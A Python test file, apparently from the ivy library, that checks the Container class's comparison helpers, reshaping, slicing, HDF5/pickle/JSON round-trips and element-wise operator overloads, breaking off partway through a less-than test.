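# container settings (e.g. print_limit); partial=True lets a smaller container match.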
def test_container_identical(dev, call):
# without key_chains specification
arr1 = ivy.array([1], dev=dev)
arr2 = ivy.array([2], dev=dev)
arr3 = ivy.array([3], dev=dev)
container0 = Container({'a': arr1, 'b': {'c': arr2, 'd': arr3}})
container1 = Container({'a': arr1, 'b': {'c': arr2, 'd': arr3}})
container2 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container3 = Container({'b': {'d': arr3}})
container4 = Container({'d': arr3})
# the same
assert ivy.Container.identical([container0, container1])
assert ivy.Container.identical([container1, container0])
# not the same
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container2, container0])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container2, container1])
# partial
assert ivy.Container.identical([container0, container3], partial=True)
assert ivy.Container.identical([container3, container0], partial=True)
assert not ivy.Container.identical([container0, container4], partial=True)
assert not ivy.Container.identical([container4, container0], partial=True)
def test_container_identical_structure(dev, call):
# without key_chains specification
container0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container1 = Container({'a': ivy.array([3], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev)}})
container2 = Container({'a': ivy.array([3], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev),
'e': ivy.array([6], dev=dev)}})
container3 = Container({'a': ivy.array([3], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev)},
'e': ivy.array([6], dev=dev)})
container4 = Container({'b': {'d': ivy.array([4], dev=dev)}})
container5 = Container({'d': ivy.array([4], dev=dev)})
# with identical
assert ivy.Container.identical_structure([container0, container1])
assert ivy.Container.identical_structure([container1, container0])
assert ivy.Container.identical_structure([container1, container0, container1])
# without identical
assert not ivy.Container.identical_structure([container2, container3])
assert not ivy.Container.identical_structure([container0, container3])
assert not ivy.Container.identical_structure([container1, container2])
assert not ivy.Container.identical_structure([container1, container0, container2])
# partial
assert ivy.Container.identical_structure([container0, container4], partial=True)
assert ivy.Container.identical_structure([container1, container4], partial=True)
assert ivy.Container.identical_structure([container2, container4], partial=True)
assert ivy.Container.identical_structure([container3, container4], partial=True)
assert ivy.Container.identical_structure([container4, container4], partial=True)
assert not ivy.Container.identical_structure([container0, container5], partial=True)
assert not ivy.Container.identical_structure([container1, container5], partial=True)
assert not ivy.Container.identical_structure([container2, container5], partial=True)
assert not ivy.Container.identical_structure([container3, container5], partial=True)
assert not ivy.Container.identical_structure([container4, container5], partial=True)
def test_container_identical_configs(dev, call):
container0 = Container({'a': ivy.array([1], dev=dev)}, print_limit=5)
container1 = Container({'a': ivy.array([1], dev=dev)}, print_limit=5)
container2 = Container({'a': ivy.array([1], dev=dev)}, print_limit=10)
# with identical
assert ivy.Container.identical_configs([container0, container1])
assert ivy.Container.identical_configs([container1, container0])
assert ivy.Container.identical_configs([container1, container0, container1])
# without identical
assert not ivy.Container.identical_configs([container1, container2])
assert not ivy.Container.identical_configs([container1, container0, container2])
def test_container_identical_array_shapes(dev, call):
# without key_chains specification
container0 = Container({'a': ivy.array([1, 2], dev=dev),
'b': {'c': ivy.array([2, 3, 4], dev=dev),
'd': ivy.array([3, 4, 5, 6], dev=dev)}})
container1 = Container({'a': ivy.array([1, 2, 3, 4], dev=dev),
'b': {'c': ivy.array([3, 4], dev=dev),
'd': ivy.array([3, 4, 5], dev=dev)}})
container2 = Container({'a': ivy.array([1, 2, 3, 4], dev=dev),
'b': {'c': ivy.array([3, 4], dev=dev),
'd': ivy.array([3, 4, 5, 6], dev=dev)}})
# with identical
assert ivy.Container.identical_array_shapes([container0, container1])
assert ivy.Container.identical_array_shapes([container1, container0])
assert ivy.Container.identical_array_shapes([container1, container0, container1])
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container0, container1, container2])
def test_container_dtype(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
dtype_container = container.dtype()
for (key, value), expected_value in zip(dtype_container.to_iterator(),
[ivy.array([1], dev=dev).dtype,
ivy.array([2.], dev=dev).dtype,
ivy.array([3], dev=dev).dtype]):
assert value == expected_value
def test_container_with_entries_as_lists(dev, call):
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': 'some string'}}
container = Container(dict_in)
container_w_list_entries = container.with_entries_as_lists()
for (key, value), expected_value in zip(container_w_list_entries.to_iterator(),
[[1],
[2.],
'some string']):
assert value == expected_value
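
# reshape_like reshapes every leaf to the shape stored at the matching key chain of
# another container; leading_shape prepends shared leading (e.g. batch) dimensions.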
def test_container_reshape_like(dev, call):
container = Container({'a': ivy.array([[1.]], dev=dev),
'b': {'c': ivy.array([[3.], [4.]], dev=dev),
'd': ivy.array([[5.], [6.], [7.]], dev=dev)}})
new_shapes = Container({'a': (1,),
'b': {'c': (1, 2, 1), 'd': (3, 1, 1)}})
# without leading shape
container_reshaped = container.reshape_like(new_shapes)
assert list(container_reshaped['a'].shape) == [1]
assert list(container_reshaped.a.shape) == [1]
assert list(container_reshaped['b']['c'].shape) == [1, 2, 1]
assert list(container_reshaped.b.c.shape) == [1, 2, 1]
assert list(container_reshaped['b']['d'].shape) == [3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 1, 1]
# with leading shape
container = Container({'a': ivy.array([[[1.]], [[1.]], [[1.]]], dev=dev),
'b': {'c': ivy.array([[[3.], [4.]], [[3.], [4.]], [[3.], [4.]]], dev=dev),
'd': ivy.array([[[5.], [6.], [7.]], [[5.], [6.], [7.]], [[5.], [6.], [7.]]],
dev=dev)}})
container_reshaped = container.reshape_like(new_shapes, leading_shape=[3])
assert list(container_reshaped['a'].shape) == [3, 1]
assert list(container_reshaped.a.shape) == [3, 1]
assert list(container_reshaped['b']['c'].shape) == [3, 1, 2, 1]
assert list(container_reshaped.b.c.shape) == [3, 1, 2, 1]
assert list(container_reshaped['b']['d'].shape) == [3, 3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 3, 1, 1]
def test_container_slice(dev, call):
dict_in = {'a': ivy.array([[0.], [1.]], dev=dev),
'b': {'c': ivy.array([[1.], [2.]], dev=dev), 'd': ivy.array([[2.], [3.]], dev=dev)}}
container = Container(dict_in)
container0 = container[0]
container1 = container[1]
assert np.array_equal(ivy.to_numpy(container0['a']), np.array([0.]))
assert np.array_equal(ivy.to_numpy(container0.a), np.array([0.]))
assert np.array_equal(ivy.to_numpy(container0['b']['c']), np.array([1.]))
assert np.array_equal(ivy.to_numpy(container0.b.c), np.array([1.]))
assert np.array_equal(ivy.to_numpy(container0['b']['d']), np.array([2.]))
assert np.array_equal(ivy.to_numpy(container0.b.d), np.array([2.]))
assert np.array_equal(ivy.to_numpy(container1['a']), np.array([1.]))
assert np.array_equal(ivy.to_numpy(container1.a), np.array([1.]))
assert np.array_equal(ivy.to_numpy(container1['b']['c']), np.array([2.]))
assert np.array_equal(ivy.to_numpy(container1.b.c), np.array([2.]))
assert np.array_equal(ivy.to_numpy(container1['b']['d']), np.array([3.]))
assert np.array_equal(ivy.to_numpy(container1.b.d), np.array([3.]))
def test_container_slice_via_key(dev, call):
dict_in = {'a': {'x': ivy.array([0.], dev=dev),
'y': ivy.array([1.], dev=dev)},
'b': {'c': {'x': ivy.array([1.], dev=dev),
'y': ivy.array([2.], dev=dev)},
'd': {'x': ivy.array([2.], dev=dev),
'y': ivy.array([3.], dev=dev)}}}
container = Container(dict_in)
containerx = container.slice_via_key('x')
containery = container.slice_via_key('y')
assert np.array_equal(ivy.to_numpy(containerx['a']), np.array([0.]))
assert np.array_equal(ivy.to_numpy(containerx.a), np.array([0.]))
assert np.array_equal(ivy.to_numpy(containerx['b']['c']), np.array([1.]))
assert np.array_equal(ivy.to_numpy(containerx.b.c), np.array([1.]))
assert np.array_equal(ivy.to_numpy(containerx['b']['d']), np.array([2.]))
assert np.array_equal(ivy.to_numpy(containerx.b.d), np.array([2.]))
assert np.array_equal(ivy.to_numpy(containery['a']), np.array([1.]))
assert np.array_equal(ivy.to_numpy(containery.a), np.array([1.]))
assert np.array_equal(ivy.to_numpy(containery['b']['c']), np.array([2.]))
assert np.array_equal(ivy.to_numpy(containery.b.c), np.array([2.]))
assert np.array_equal(ivy.to_numpy(containery['b']['d']), np.array([3.]))
assert np.array_equal(ivy.to_numpy(containery.b.d), np.array([3.]))
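
# the HDF5 round-trip writes arrays along a batch dimension: max_batch_size fixes the
# on-disk batch capacity, starting_index appends further batch entries, and
# from_disk_as_hdf5 accepts a slice selecting which entries to load.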
def test_container_to_and_from_disk_as_hdf5(dev, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = 'container_on_disk.hdf5'
dict_in_1 = {'a': ivy.array([np.float32(1.)], dev=dev),
'b': {'c': ivy.array([np.float32(2.)], dev=dev),
'd': ivy.array([np.float32(3.)], dev=dev)}}
container1 = Container(dict_in_1)
dict_in_2 = {'a': ivy.array([np.float32(1.), np.float32(1.)], dev=dev),
'b': {'c': ivy.array([np.float32(2.), np.float32(2.)], dev=dev),
'd': ivy.array([np.float32(3.), np.float32(3.)], dev=dev)}}
container2 = Container(dict_in_2)
# saving
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_hdf5(save_filepath, slice(1))
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container1.a))
assert np.array_equal(ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container1.b.c))
assert np.array_equal(ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container1.b.d))
# appending
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2, starting_index=1)
assert os.path.exists(save_filepath)
# loading after append
loaded_container = Container.from_disk_as_hdf5(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container2.a))
assert np.array_equal(ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container2.b.c))
assert np.array_equal(ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container2.b.d))
# load slice
loaded_sliced_container = Container.from_disk_as_hdf5(save_filepath, slice(1, 2))
assert np.array_equal(ivy.to_numpy(loaded_sliced_container.a), ivy.to_numpy(container1.a))
assert np.array_equal(ivy.to_numpy(loaded_sliced_container.b.c), ivy.to_numpy(container1.b.c))
assert np.array_equal(ivy.to_numpy(loaded_sliced_container.b.d), ivy.to_numpy(container1.b.d))
# file size
file_size, batch_size = Container.h5_file_size(save_filepath)
assert file_size == 6 * np.dtype(np.float32).itemsize
assert batch_size == 2
os.remove(save_filepath)
def test_container_to_disk_shuffle_and_from_disk_as_hdf5(dev, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = 'container_on_disk.hdf5'
dict_in = {'a': ivy.array([1, 2, 3], dev=dev),
'b': {'c': ivy.array([1, 2, 3], dev=dev), 'd': ivy.array([1, 2, 3], dev=dev)}}
container = Container(dict_in)
# saving
container.to_disk_as_hdf5(save_filepath, max_batch_size=3)
assert os.path.exists(save_filepath)
# shuffling
Container.shuffle_h5_file(save_filepath)
# loading
container_shuffled = Container.from_disk_as_hdf5(save_filepath, slice(3))
# testing
data = np.array([1, 2, 3])
random.seed(0)
random.shuffle(data)
assert (ivy.to_numpy(container_shuffled['a']) == data).all()
assert (ivy.to_numpy(container_shuffled.a) == data).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == data).all()
assert (ivy.to_numpy(container_shuffled['b']['d']) == data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == data).all()
os.remove(save_filepath)
# def test_container_pickle(dev, call):
# if call in [helpers.tf_graph_call]:
# # container disk saving requires eager execution
# pytest.skip()
# dict_in = {'a': ivy.array([np.float32(1.)], dev=dev),
# 'b': {'c': ivy.array([np.float32(2.)], dev=dev),
# 'd': ivy.array([np.float32(3.)], dev=dev)}}
#
# # without module attribute
# cont = Container(dict_in)
# assert cont._local_ivy is None
# pickled = pickle.dumps(cont)
# cont_again = pickle.loads(pickled)
# assert cont_again._local_ivy is None
# ivy.Container.identical_structure([cont, cont_again])
# ivy.Container.identical_configs([cont, cont_again])
#
# # with module attribute
# cont = Container(dict_in, ivyh=ivy)
# assert cont._local_ivy is ivy
# pickled = pickle.dumps(cont)
# cont_again = pickle.loads(pickled)
# # noinspection PyUnresolvedReferences
# assert cont_again._local_ivy.current_framework_str() is ivy.current_framework_str()
# ivy.Container.identical_structure([cont, cont_again])
# ivy.Container.identical_configs([cont, cont_again])
def test_container_to_and_from_disk_as_pickled(dev, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = 'container_on_disk.pickled'
dict_in = {'a': ivy.array([np.float32(1.)], dev=dev),
'b': {'c': ivy.array([np.float32(2.)], dev=dev),
'd': ivy.array([np.float32(3.)], dev=dev)}}
container = Container(dict_in)
# saving
container.to_disk_as_pickled(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_pickled(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container.a))
assert np.array_equal(ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container.b.c))
assert np.array_equal(ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container.b.d))
os.remove(save_filepath)
def test_container_to_and_from_disk_as_json(dev, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = 'container_on_disk.json'
dict_in = {'a': 1.274e-7, 'b': {'c': True, 'd': ivy.array([np.float32(3.)], dev=dev)}}
container = Container(dict_in)
# saving
container.to_disk_as_json(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_json(save_filepath)
assert np.array_equal(loaded_container.a, container.a)
assert np.array_equal(loaded_container.b.c, container.b.c)
assert isinstance(loaded_container.b.d, str)
os.remove(save_filepath)
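
# the remaining tests exercise operator overloading: unary, arithmetic and comparison
# operators are applied leaf-wise, scalars are broadcast to every array, and the
# reverse_* tests cover the reflected operators with the scalar on the left.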
def test_container_positive(dev, call):
container = +Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([-2], dev=dev), 'd': ivy.array([3], dev=dev)}})
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_negative(dev, call):
container = -Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([-2], dev=dev), 'd': ivy.array([3], dev=dev)}})
assert np.allclose(ivy.to_numpy(container['a']), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([-1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([-3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-3]))
# def test_container_pow(dev, call):
# container_a = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_b = Container({'a': ivy.array([2], dev=dev),
# 'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
# container = container_a ** container_b
# assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([16]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([16]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([729]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([729]))
def test_container_scalar_pow(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container_a ** 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_reverse_scalar_pow(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 ** container
assert np.allclose(ivy.to_numpy(container['a']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([8]))
def test_container_scalar_addition(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container += 3
assert np.allclose(ivy.to_numpy(container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_reverse_scalar_addition(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 3 + container
assert np.allclose(ivy.to_numpy(container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_addition(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
container = container_a + container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.a), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([6]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_scalar_subtraction(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container -= 1
assert np.allclose(ivy.to_numpy(container['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_subtraction(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 1 - container
assert np.allclose(ivy.to_numpy(container['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-1]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-2]))
def test_container_subtraction(dev, call):
container_a = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
container_b = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([1], dev=dev), 'd': ivy.array([4], dev=dev)}})
container = container_a - container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_sum(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
container = sum([container_a, container_b])
assert np.allclose(ivy.to_numpy(container['a']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.a), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([6]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_scalar_multiplication(dev, call):
container = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([3.], dev=dev)}})
container *= 2.5
assert np.allclose(ivy.to_numpy(container['a']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5.]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_reverse_scalar_multiplication(dev, call):
container = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([3.], dev=dev)}})
container = 2.5 * container
assert np.allclose(ivy.to_numpy(container['a']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5.]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_multiplication(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
container = container_a * container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([8]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([18]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([18]))
def test_container_scalar_truediv(dev, call):
container = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([5.], dev=dev), 'd': ivy.array([5.], dev=dev)}})
container /= 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2.5]))
def test_container_reverse_scalar_truediv(dev, call):
container = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([5.], dev=dev), 'd': ivy.array([5.], dev=dev)}})
container = 2 / container
assert np.allclose(ivy.to_numpy(container['a']), np.array([2.]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0.4]))
def test_container_truediv(dev, call):
container_a = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([5.], dev=dev), 'd': ivy.array([5.], dev=dev)}})
container_b = Container({'a': ivy.array([2.], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([4.], dev=dev)}})
container = container_a / container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([1.25]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1.25]))
def test_container_scalar_floordiv(dev, call):
if call is helpers.mx_call:
        # MXNet arrays do not overload the // operator; support can be added once an explicit ivy.floordiv is implemented.
pytest.skip()
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container //= 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_floordiv(dev, call):
if call is helpers.mx_call:
        # MXNet arrays do not overload the // operator; support can be added once an explicit ivy.floordiv is implemented.
pytest.skip()
container = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([1], dev=dev), 'd': ivy.array([7], dev=dev)}})
container = 5 // container
assert np.allclose(ivy.to_numpy(container['a']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0]))
def test_container_floordiv(dev, call):
if call is helpers.mx_call:
        # MXNet arrays do not overload the // operator; support can be added once an explicit ivy.floordiv is implemented.
pytest.skip()
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([4], dev=dev)}})
container = container_a // container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1]))
def test_container_abs(dev, call):
container = abs(Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([-2], dev=dev), 'd': ivy.array([3], dev=dev)}}))
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_scalar_less_than(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container < 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 < container
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_less_than(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
